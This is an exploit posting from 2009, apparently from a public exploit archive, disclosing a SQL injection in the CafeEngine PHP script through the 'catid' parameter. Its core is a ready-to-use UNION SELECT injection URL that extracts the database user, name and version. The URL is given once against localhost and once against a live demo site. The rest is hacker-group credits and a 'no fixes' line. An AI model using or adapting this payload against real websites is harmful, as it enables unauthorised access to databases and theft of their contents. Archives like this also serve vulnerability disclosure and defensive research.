CafeEngine (index.php catid) Remote SQL Injection Vulnerability

2009-02-06 17:05:13


/************************************************************************/
/* */
/* CAFE ENGINE */
/* */
/* Remote SQL Injection Vulnerability */
/* */
/* */
/************************************************************************/




[~]AUTHOR : SuNHouSe2 [ALGERIAN HaCkEr]

[~]HOME : http://www.snakespc.com

[~]VERSION : EASY CAFE ENGINE

[~]BUY SCRIPT : http://cafeengine.com/ >>> Price : 10$

[~]EXPLOIT :

http://127.0.0.1/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--

[~]DEMO WEBSITE :
http://easy.cafeengine.com/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--


/////////////////////////////////////////////////////////////////////////////////////

//////// Special ThanX : His0k4,& ALL Snakespc.com Members ////////////
//////// :Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:
//////// ::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: ////////////

////////////////////////////////////////////////////////////////////////////////////


-=-=-=-= [email protected] =-=-=-

#

Fixes

No fixes

In order to submit a new fix you need to be registered.